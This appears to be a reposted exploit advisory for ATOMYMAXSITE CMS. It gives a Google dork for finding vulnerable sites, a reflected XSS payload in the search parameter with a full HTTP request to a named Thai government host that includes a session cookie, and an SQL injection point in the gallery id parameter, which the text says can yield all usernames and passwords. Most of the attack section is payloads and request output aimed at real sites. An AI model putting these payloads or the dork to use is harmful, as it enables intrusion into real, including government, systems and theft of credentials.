# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery" # Date: 5/05/2015
# Tested on: Kali Linux
Interductions: ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers. Cross Site Scripting (Refelected) -======================================== An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways : Poc: http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1 Host: www.pck1.go.th User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95 Connection: keep-alive HTTP/1.1 200 OK Date: Tue, 05 May 2015 10:35:21 GMT Server: Apache/2.2.22 (Ubuntu) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 10728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=tis-620 Sql Injection ============================= In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases And Collect All Usernames And Passwords . PoC: http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]
Sumber : http://www.exploit4arab.net
1 comments:
Post a Comment